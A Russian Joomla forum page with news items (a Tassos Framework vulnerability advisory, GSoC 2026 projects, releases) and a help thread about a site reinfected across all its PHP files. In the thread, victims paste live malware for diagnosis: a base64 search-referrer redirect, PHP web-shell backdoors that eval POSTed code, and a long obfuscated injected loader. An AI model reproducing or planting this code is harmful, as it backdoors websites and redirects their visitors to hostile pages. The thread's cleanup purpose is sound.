Новости Joomla

‼️ 👩‍💻 Обновление безопасности для Tassos Framework!

‼️ 👩‍💻 Обновление безопасности для Tassos Framework!

7 января 2026 года греческому разработчику Тассосу Мариносу сообщили об уязвимости в системном плагине Tassos Framework, который входит в состав его расширений для Joomla.

⚠️ Проблема затрагивает следующие расширения:
- Convert Forms - конструктор форм обратной связи для Joomla
- EngageBox - конструктор всплывающих окон для Joomla
- Google Structured Data - пакет плагинов микроразметки для Joomla
- Advanced Custom Fields - пакет плагинов пользовательских полей (видео-сервисы, карты и иже с ними)
- Smile Pack - пакет расширений
- MailChimp Auto-Subscribe

Незамедлительно была проведена полная внутренняя проверка кода, внедрены дополнительные меры проверки и повышения безопасности, а также выпущены исправленные версии всех затронутых расширений. Проблема полностью решена.

👉 Суть уязвимости.
Уязвимость заключалась в том, как плагин Tassos Framework обрабатывал определенные AJAX-запросы через com_ajaxточку входа Joomla. При определенных условиях внутренняя функциональность фреймворка могла быть вызвана без надлежащих ограничений.

В худшем случае это могло позволить неавторизованному злоумышленнику читать файлы, доступные веб-серверу. Это также могло позволить удалять файлы с сервера при выполнении определенных условий.

При определенных обстоятельствах запросы к базе данных могли быть изменены для извлечения данных из базы данных Joomla. В совокупности эти возможности потенциально могли быть использованы для повышения уровня доступа и выполнения несанкционированного кода.

В настоящее время нет никаких доказательств того, что эта уязвимость была использована в реальных условиях.

Немедленно обновите расширения до безопасных версий (Joomla 4/5/6 | Joomla 3):
- Convert Forms - v5.1.1 / v.4.1.1
- EngageBox - v.7.1.1 / v,6,3,9
- Google Structured Data - v.6.1.1 / v.5.6.9
- Advanced Custom Fields - v.3.1.1 / v.2.8.10
- Smile Pack - v.2.1.1 / v.1.2.4.
- MailChimp Auto-Subscribe - v.5.1.1+ / v.5.0.4

Все указанные версии включают в себя релиз безопасности плагина Tassos Framework System Plugin v6.0.62.

Если у вас установлено несколько расширений Tassos, достаточно обновить только одно, чтобы применить патч. Однако всегда рекомендуется обновлять все расширения.

@joomlafeed

👩‍💻 Joomla включена в программу Google Summer of Code 2026.

👩‍💻 Joomla включена в программу Google Summer of Code 2026.

Google Summer of Code (GSoC) - программа компании Google, которая позволяет участникам программы под руководством опытных наставников писать код для организаций, занимающейся открытым исходным кодом. Joomla принимает участие в этой программе не в первый раз и в 2026 году снова включена в список GSoC. Для программы утверждается список "идей", воплотить которые должны участники под руководством наставников.

Проекты Joomla в рамках программы GSoC 2026.

Проект I: Ajax-бэкенд.
- Действия в административной панели без необходимости обновлять страницу.
- Автоматическое сохранение содержимого во время редактирования.
- Расширенный фильтр - поиск и фильтрация по пользовательским полям.

Проект II: Автоматизация рабочих процессов (workflow + task scheduler).
Joomla имеет функцию процессов и планировщика задач. Теперь эти две функции следует объединить, чтобы пользователь мог настраивать назначенные рабочие процессы таким образом, чтобы переходы выполнялись автоматически, с возможностью точного определения времени. Должна быть возможность создавать циклы или прямые запланированные рабочие процессы. Предполагается, что интерфейс должен учитывать хороший пользовательский опыт, удобство использования и современные стандарты доступности. Ожидается, что будет добавлен интерфейс для управления процессами и их расписанием на страницах категорий и материалов. Так же ожидается, что сторонние компоненты также смогут воспользоваться этим функционалом.

Проект III: Мультикатегории.
В настоящее время Joomla! не позволяет назначать один элемент нескольким категориям. Хотя система тегов часто используется в качестве замены, существует острая потребность в нативной поддержке нескольких категорий, чтобы привести Joomla! в соответствие с другими современными системами управления контентом.

Проект IV: Обучение с подкреплением на основе отзывов переводчиков.
Joomla собирается использовать автоматический перевод документации. В каждом языке есть свои специфические слова, характерные для Joomla. Предполагается обучать языковые модели, используя обратную связь от переводчиков, чтобы постоянно улучшать качество переводов и учитывать специфические языковые особенности Joomla.

Принять участие GSoC 2026
Подробнее о проектах Joomla GSoC 2026
Чат GSoC в Mattermost (международное сообщество Joomla)

Вышли релизы Joomla 6.0.3 и Joomla 5.4.3

Релиз Joomla 6.0.3 и Joomla 5.4.3

Проект Joomla рад сообщить о выпуске Joomla 6.0.3 и Joomla 5.4.3. Это релиз исправлений ошибок и улучшений для серии Joomla 6.0 и Joomla 5.4.

0 Пользователей и 1 Гость просматривают эту тему.
  • 20 Ответов
  • 11286 Просмотров
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Уже почти месяц пытаемся бороться с проблемой. Сайт был заражен, как именно, наверное, уже неважно, факт в том, что на сайте засел вирус, который не поддается удалению. То есть его удаляют, но он сова размножается по всем файлам. На сайте работает админ, до него там работал я (конец лета), сейчас я просто помогаю разобраться с проблемой. Компы у всех чистые - вирусов нет ни у меня, ни у нее. Если пробовать переходить на сайт через Яндекс - редирект стоит на вирусную ссылку.

Кто-нибудь сталкивался с подобными проблемами?Что делать?
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
это вирус 'PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7Ym90dG9tOjBweDtsZWZ0Oi0xMDI0M3B4OyI+PGgyPjxhIGhyZWY9Imh0dHA6Ly93d3cudm96dm9kaW1kb20uY29tIiB0YXJnZXQ9Il9ibGFuayI+d3d3LnZvenZvZGltZG9tLmNvbTwvYT48L2gyPjwvZGl2Pg==';

вам надо вирусы удалить
ищите тотал командером по слову base64_decode
и хак слово decode($_POST


благодарность принимаю плюсами или деньгами на R184892837312
*

MarVel

  • Новичок
  • 3
  • 0 / 0
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));
Вот так выглядит этот код, я его удаляю а он через некоторое время появляется вновь, разница лишь в количестве знаков "=" в конце кода.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
ищите на хосте вирус файл PHP с строчкой decode($_POST
примерно такой <?php if(md5($_POST["password"])=="c2725594aaf2c0327abf7d144c3f991c"){eval(base64_decode($_POST["code"]));}?>

лежит скорее всего в images/post.php

он вскрывает систему завново

*

MarVel

  • Новичок
  • 3
  • 0 / 0
<?php eval(base64_decode($_POST["php"])); ?> вот что в этом файле лежит, это оно? простите, в я в рнр не сильна :(
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
ну начнем с того что в папке images  вообще не должно быть файла post.php если он там есть значит смело удаляем

не забываем
благодарность принимаю плюсами или деньгами на R184892837312
*

MarVel

  • Новичок
  • 3
  • 0 / 0
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно.....
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Смотрите логи доступа. Может поможет http://joomlaforum.ru/index.php/topic,195980.0.html.
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Цитировать
Я удалила из папки images все файлы с расширением php, полностью удалила вредоносные записи из всех документов, но редирект все равно идет время от времени само по себе меню то пропадает то появляется, при этом если заходить через админку то пишет что нет файлов.. а через буквально пару часов все становится на место и меню уже присутствует и доступно.....
как вариант, удалили не все, или же удалили наоборот что то нужное для работы сайта
у меня был случай когда заразили 9 000 файлов, вы из скольких удалили?
*

rembot

  • Захожу иногда
  • 101
  • 2 / 0
  • +++
http://joomlaforum.ru/index.php/topic,198048.0.html - С помощью скрипта из этой темы можно просканить систему и узнать где вы не почистили. Возможно вредоносный код остался в каком то из файлов модулей.
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #10 : 03.02.2012, 13:25:34 »
ничего не помогает...
*

hedeag

  • Захожу иногда
  • 377
  • 23 / 3
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #11 : 03.02.2012, 13:29:45 »
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка
*

Fedor Vlasenko

  • Живу я здесь
  • 3845
  • 733 / 7
  • https://fedor-vlasenko.web.app
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #12 : 03.02.2012, 13:31:10 »
ничего не помогает...
из своего опыта. порой легче разархивировать Joomla и ее модули компоненты и т. д и подключить к старой базе.
*

art-m1987

  • Захожу иногда
  • 124
  • 1 / 1
Re: Вирус на сайте Joomla во всех php файлах.
« Ответ #13 : 03.02.2012, 13:46:12 »
ну если ничего не помогает обращайтесь к спецам за деньги, есть коммерческая ветка

Плиз, ссылочку дайте.
*

Aleks_El_Dia

  • Moderator
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

genius999

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #15 : 23.02.2013, 03:24:30 »
Люди, у меня во всех PHP файлах вот такая вот бодяга, как быть? К тому же когда пытаюсь добавить материал, кнопки никак не реагируют в админке. За ранее всех благодарю!
Код
<?php /*versio:2.12*/$Il1I=0;$GLOBALS['Il1I'] = 'Y.Y3VybAUiX2luaXQQ!!Q~aYWxsb3dfdXJsX2ZvcGVuMQxqX3NldG9wdA%X2V4ZWMXw;TY2xvc2UcB PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4$SFRUUF9IT1NUMTI3LgReMTAuJNMTkyLjE2OC4hvlAdwPl^a29ubW8ubmV0hmZ2Fib3Iuc2Uec2lsYmVyLmRlZ#aGF2ZWFwb2tlLmNvbS5hdQ&VWV8Ogb.fZGlzcGxheV9lcnJvcnM x_ZGV0ZXJtaW5hdG9yNmYW5kMi4xMgmRmVoWXg0dzR3ZjB3M2QxPYmFzZTY0X2RlY29kZQrYmFzZTY0X2VuY29kZQHgjaHR0cDovLwLej $NSFRUUF9VU0VSX0FHRU5UdW5pb24otaMUc2VsZWN0nD&TUkVRVUVTVF9VUkkU0NSSVBUX05BTUUUVVFUllfU1RSSU5HPw)@L3RtcC8zXL3RtcAo=TVE1Q{RrVEVNUARVE1QRElSD~{OdXBsb2FkX3RtcF9kaXI(wLgkdmVyc2lvzLQ(DULXBocApSFRUUF9FWEVDUEhQL}EWb3V0_b2s}IfwaHR0cAFOi8v%aZP#L3BnLnBocD91PQUg~Jms9l)JnQ9cGhwJnA9$YJnY9AnNZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lnS0NGa1pXWnBibVZrS0NKa1pYUmxjbTFwYm1GMGIzSWlLU2w3SUdaMWJtTjBhVzl1SUdkbGRHWnBiR1VvSkVreFNVbHNTU2w3SUNSUlVUQlBVVThnUFNCUlVWRXdVVkV3TUNneUxDQTJLVHNnSkZFd1QwOVBUeUE5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTVRBc0lEY3BPeUJwWmlBb1FHbHVhVjluWlhRb1VWRlJNRkZSTURBb01qTXNJREl3S1NrZ1BUMGdVVkZSTUZGUk1EQW9ORE1zSURJcEtTQjdJQ1JKYkVsc2JFazlRR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ1JKTVVsSmJFa3BPeUJ5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE95QjlJR1ZzYzJWcFppQW9ablZ1WTNScGIyNWZaWGhwYzNSektDUlJNRTlQVDA4cEtYc2dKRWt4TVRGSmJDQTlJRUFrVVRCUFQwOVBLQ2s3SUNSUk1FOVBVVkVnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RRM0xDQXhNQ2s3SUNSSk1XeEpiR3dnUFNBa1VWRXdUMUZQTGxGUlVUQlJVVEF3S0RVNExDQTNLVHNnSkZGUlQwOVJVU0E5SUNSUlVUQlBVVTh1VVZGUk1GRlJNREFvTmpVc0lESXBMbEZSVVRCUlVUQXdLRFk1TENBM0tUc2dRQ1JSTUU5UFVWRW9KRWt4TVRGSmJDd2dRMVZTVEU5UVZGOVZVa3dzSUNSSk1VbEpiRWtwT3lCQUpGRXdUMDlSVVNna1NURXhNVWxzTENCRFZWSk1UMUJVWDBoRlFVUkZVaXhtWVd4elpTazdJRUFrVVRCUFQxRlJLQ1JKTVRFeFNXd3NJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc2RISjFaU2s3SUVBa1VUQlBUMUZSS0NSSk1URXhTV3dzSUVOVlVreFBVRlJmUTA5T1RrVkRWRlJKVFVWUFZWUXNOU2s3SUdsbUlDZ2tTVEZzYkRGc0lEMGdRQ1JKTVd4SmJHd29KRWt4TVRGSmJDa3BJSHR5WlhSMWNtNGdVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdRQ1JSVVU5UFVWRW9KRWt4TVRGSmJDazdJSEpsZEhWeWJpQlJVVkV3VVZFd01DZzBOU3dnTUNrN0lIMGdaV3h6WlNCN0lISmxkSFZ5YmlCUlVWRXdVVkV3TUNnM09Td2dNVFFwTGlSSk1VbEpiRWt1VVZGUk1GRlJNREFvT1RNc0lETTVLVHNnZlNCOUlHWjFibU4wYVc5dUlIVndaQ2drVVU5UFVVOHdMQ1JKTVVsSmJFa3BleUFrVVRCUk1EQlJJRDBnUUdkbGRHaHZjM1JpZVc1aGJXVW9RQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLREV6TXl3Z01USXBYU2s3SUdsbUlDZ2tVVEJSTURCUklDRTlQU0JSVVZFd1VWRXdNQ2cwTlN3Z01Da2dZVzVrSUhOMGNuQnZjeWdrVVRCUk1EQlJMQ0JSVVZFd1VWRXdNQ2d4TkRVc0lEWXBLU0FoUFQwZ01DQmhibVFnYzNSeWNHOXpLQ1JSTUZFd01GRXNJRkZSVVRCUlVUQXdLREUxTXl3Z05Da3BJQ0U5UFNBd0lHRnVaQ0J6ZEhKd2IzTW9KRkV3VVRBd1VTd2dVVkZSTUZGUk1EQW9NVFU1TENBeE1Ta3BJQ0U5UFNBd0tYc2dKRkZSTUZGUlVUMUFabTl3Wlc0b0pGRlBUMUZQTUN4UlVWRXdVVkV3TUNneE56UXNJRElwS1RzZ1FHWmpiRzl6WlNna1VWRXdVVkZSS1RzZ2FXWWdLRUJwYzE5bWFXeGxLQ1JSVDA5UlR6QXBLWHNnZDNKcGRHVW9KRkZQVDFGUE1Dd2daMlYwWm1sc1pTZ2tTVEZKU1d4SktTazdJSDA3SUgwZ2ZTQWtTV3d4Ykd4SklEMGdRWEp5WVhrb1VWRlJNRkZSTURBb01UYzVMQ0F4TWlrc0lGRlJVVEJSVVRBd0tERTVNeXdnTVRFcExDQlJVVkV3VVZFd01DZ3lNRFVzSURFeUtTd2dVVkZSTUZGUk1EQW9NakU1TENBeU1pa3BPeUFrU1RGSlNURnNJRDBnSkVsc01XeHNTVnN4WFRzZ1puVnVZM1JwYjI0Z2QzSnBkR1VvSkZGUFQxRlBNQ3drU1RGSlNURXhLWHNnYVdZZ0tDUlJNRkV3VVZFOVFHWnZjR1Z1S0NSUlQwOVJUekFzVVZGUk1GRlJNREFvTVRjMExDQXlLU2twZXlCQVpuZHlhWFJsS0NSUk1GRXdVVkVzSkVreFNVa3hNU2s3SUVCbVkyeHZjMlVvSkZFd1VUQlJVU2s3SUgwZ2ZTQm1kVzVqZEdsdmJpQnZkWFJ3ZFhRb0pFa3hNVEV4TVN3Z0pGRXdVVkZQTUNsN0lHVmphRzhnVVZGUk1GRlJNREFvTWpRekxDQXpLUzRrU1RFeE1URXhMbEZSVVRCUlVUQXdLREkwTml3Z01pa3VKRkV3VVZGUE1DNGlYSEpjYmlJN0lIMGdablZ1WTNScGIyNGdjR0Z5WVcwb0tYc2djbVYwZFhKdUlGRlJVVEJSVVRBd0tEUTFMQ0F3S1RzZ2ZTQkFhVzVwWDNObGRDaFJVVkV3VVZFd01DZ3lOVEVzSURFNUtTd2dNQ2s3SUdSbFptbHVaU2hSVVZFd1VWRXdNQ2d5TnpNc0lERTJLU3dnTVNrN0lDUlJNREF3VVZFOVVWRlJNRkZSTURBb01qa3hMQ0EwS1RzZ0pGRlBUekJQVVQxUlVWRXdVVkV3TUNneU9UVXNJRFlwT3lBa1VWRlBVVTh3UFZGUlVUQlJVVEF3S0RNd01pd2dNakFwT3lBa1NVa3hiRWxKUFZGUlVUQlJVVEF3S0RNeU15d2dNVGdwT3lBa1VWRlJVVEJSUFZGUlVUQlJVVEF3S0RNME1pd2dNVGdwT3lBa1NVbEpiR3hzUFZGUlVUQlJVVEF3S0RNMk15d2dNVEFwT3lBa1NVbEpiR3hzTGoxemRISjBiMnh2ZDJWeUtFQWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZ3hNek1zSURFeUtWMHBPeUFrU1d4c01Xd3hJRDBnUUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RNM09Td2dNakFwWFRzZ1ptOXlaV0ZqYUNBb0pGOUhSVlFnWVhNZ0pFa3hNVEV4TVQwK0pGRXdVVkZQTUNsN0lHbG1JQ2h6ZEhKd2IzTW9KRkV3VVZGUE1DeFJVVkV3VVZFd01DZ3pPVGtzSURjcEtTbDdKRjlIUlZSYkpFa3hNVEV4TVYwOVVWRlJNRkZSTURBb05EVXNJREFwTzMwZ1pXeHpaV2xtSUNoemRISndiM01vSkZFd1VWRlBNQ3hSVVZFd1VWRXdNQ2cwTVRFc0lEZ3BLU2w3SkY5SFJWUmJKRWt4TVRFeE1WMDlVVkZSTUZGUk1EQW9ORFVzSURBcE8zMGdmU0JwWmlnaGFYTnpaWFFvSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRJekxDQXhOU2xkS1NrZ2V5QWtYMU5GVWxaRlVsdFJVVkV3VVZFd01DZzBNak1zSURFMUtWMGdQU0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRNNExDQXhOU2xkT3lCcFppaEFKRjlUUlZKV1JWSmJVVkZSTUZGUk1EQW9ORFV6TENBeE5pbGRLU0I3SUNSZlUwVlNWa1ZTVzFGUlVUQlJVVEF3S0RReU15d2dNVFVwWFNBdVBTQlJVVkV3VVZFd01DZzBOamtzSURJcElDNGdRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFExTXl3Z01UWXBYVHNnZlNCOUlHbG1JQ2drVVU4d1R6QlBQU1JKU1Vsc2JHd3VRQ1JmVTBWU1ZrVlNXMUZSVVRCUlVUQXdLRFF5TXl3Z01UVXBYU2w3SUNSSk1VbHNiRWs5UUcxa05TZ2tTVWxKYkd4c0xpUlJUMDh3VDFFdVVFaFFYMDlUTGlSUlVVOVJUekFwT3lBa1VWRlJVVEF3UFZGUlVUQlJVVEF3S0RRM015d2dOeWs3SUNSUlVVOVJUMUVnUFNCQmNuSmhlU2hSVVZFd1VWRXdNQ2cwT0RJc0lEWXBMQ0JBSkY5VFJWSldSVkpiVVZGUk1GRlJNREFvTkRreExDQTBLVjBzSUVBa1gxTkZVbFpGVWx0UlVWRXdVVkV3TUNnME9UZ3NJRFlwWFN3Z1FDUmZSVTVXVzFGUlVUQlJVVEF3S0RRNU1Td2dOQ2xkTENCQUpGOUZUbFpiVVZGUk1GRlJNREFvTlRBMUxDQTRLVjBzSUVBa1gwVk9WbHRSVVZFd1VWRXdNQ2cwT1Rnc0lEWXBYU3dnUUdsdWFWOW5aWFFvVVZGUk1GRlJNREFvTlRFM0xDQXhPU2twS1RzZ1ptOXlaV0ZqYUNBb0pGRlJUMUZQVVNCaGN5QWtTV3hKTVVreEtYc2dhV1lnS0NGbGJYQjBlU2drU1d4Sk1Va3hLU2w3SUNSSmJFa3hTVEV1UFVSSlVrVkRWRTlTV1Y5VFJWQkJVa0ZVVDFJN0lHbG1JQ2hBYVhOZmQzSnBkR0ZpYkdVb0pFbHNTVEZKTVNrcGV5QWtVVkZSVVRBd0lEMGdKRWxzU1RGSk1Uc2dZbkpsWVdzN0lIMGdmU0I5SUNSMGJYQTlKRkZSVVZFd01DNVJVVkV3VVZFd01DZzFNemdzSURJcExpUkpNVWxzYkVrN0lHbG1JQ2hBSkY5VFJWSldSVkpiSWtoVVZGQmZXVjlCVlZSSUlsMDlQU1JKTVVsc2JFa3BleUJsWTJodklDSmNjbHh1SWpzZ1FHOTFkSEIxZENoUlVWRXdVVkV3TUNnMU5ERXNJRGdwTENBa1VVOVBNRTlSTGxGUlVUQlJVVEF3S0RVMU1Dd2dNaWt1SkZFd01EQlJVUzVSVVZFd1VWRXdNQ2cxTlRVc0lEWXBLVHNnYVdZZ0tDUkpiR3hzYkRFOUpFbEpNV3hKU1NoQUpGOVRSVkpXUlZKYlVWRlJNRkZSTURBb05UWXlMQ0F4TmlsZEtTbDdJRUJsZG1Gc0tDUkpiR3hzYkRFcE95QmxZMmh2SUNKY2NseHVJanNnUUc5MWRIQjFkQ2hSVVZFd1VWRXdNQ2cxT0RJc0lEUXBMQ0JSVVZFd1VWRXdNQ2cxT0Rjc0lETXBLVHNnZlNCbGVHbDBLREFwT3lCOUlHbG1JQ2hBYVhOZlptbHNaU2drZEcxd0tTbDdJRUJwYm1Oc2RXUmxYMjl1WTJVb0pIUnRjQ2s3SUgwZ1pXeHpaWHNnSkZGUE1FOHdUejFBZFhKc1pXNWpiMlJsS0NSUlR6QlBNRThwT3lCMWNHUW9KSFJ0Y0N4UlVWRXdVVkV3TUNnMU9UUXNJRFlwTGxGUlVUQlJVVEF3S0RZd01Td2dOQ2t1SkVsc01XeHNTVnN3WFM1UlVWRXdVVkV3TUNnMk1UQXNJREUwS1M0a1VVOHdUekJQTGxGUlVUQlJVVEF3S0RZeU55d2dOQ2t1SkVreFNXeHNTUzVSVVZFd1VWRXdNQ2cyTXpNc0lERXlLUzRrVVRBd01GRlJMbEZSVVRCUlVUQXdLRFkwTnl3Z05Da3VKRkZQVHpCUFVTazdJSDBnZlNCOSIpKTswcHJlZ19yZXBsYWNlxul6261736536345f6465636f6465';if (!function_exists('QQQ0QQ00')){function QQQ0QQ00($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*',substr($c, -26)); return $d(substr($c, $a, $b));}};$Q0QOOOQ00 = QQQ0QQ00(6474, 16);$Q0QOOOQ00("/Il11lIIII/e", QQQ0QQ00(654, 5819), "Il11lIIII");?>
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #16 : 23.02.2013, 05:35:17 »
Бодягу удалить.Проверить JavaScript, а лучше перезалить файлы как было написано выше.
*

mysuccess

  • Осваиваюсь на форуме
  • 10
  • 0 / 0
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #17 : 05.06.2013, 15:40:02 »
Как найти источник? Как он может выглядеть (код)?
*

LyalyaChornaya

  • Захожу иногда
  • 236
  • 15 / 1
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #18 : 05.06.2013, 16:03:03 »
Недавно было тоже самое. Сначала пробовала по очереди открывать файлы и чистить, но просидев часа 2, поняла, что это... надолго... Если у вас стоит Акеба бэкап, то вытаскивайте последний бэкап перед заражением и восстанавливайте, единственный выход, у меня все прекрасно получилось именно таким методом. Если нет - на хосте должны быть автокопии. Чистить 20 000 файлов представляете, сколько времени займет, да вдобавок зараженные файлы опять заражают те, что уже подчищены.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #19 : 05.06.2013, 16:20:21 »
Вот вот- Акеба помощник хакера № 2, согласно установок хакеров по взлому сайтов Joomla.
Как найти источник? Как он может выглядеть (код)?
В раздел Безопасность, и там есть почти все- и код, и как найти источник/бекдор/шелл
*

LyalyaChornaya

  • Захожу иногда
  • 236
  • 15 / 1
Re: Вирус на сайте Joomla во всех php файлах
« Ответ #20 : 06.06.2013, 09:04:11 »
Цитировать
согласно установок хакеров по взлому сайтов Joomla
Где б эти установки прочитать, чтоб так не делать? ;D
 Ну тем не менее, акеба только и спас
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Joomla 1.5 как убрать кнопку редактировать материант с сайта

Автор andriy465

Ответов: 5
Просмотров: 11765
Последний ответ 12.11.2023, 23:37:03
от all_zer
На сайте правая колонна ушла в низ

Автор vityavoluevich

Ответов: 3
Просмотров: 4387
Последний ответ 27.10.2023, 08:45:48
от vityavoluevich
Каков ваш заработок на сайте?возможно ли пролететь и создать не прибыльный сайт?

Автор bedalex

Ответов: 3
Просмотров: 8679
Последний ответ 05.06.2023, 11:00:40
от Ритулька88
Нужно wiki под Joomla

Автор THE KILLERS

Ответов: 9
Просмотров: 14955
Последний ответ 05.11.2020, 20:56:47
от Kijv
Поиск статьи по url сайта в админке Joomla 1.5

Автор Tema

Ответов: 5
Просмотров: 8948
Последний ответ 14.08.2020, 07:16:44
от rsn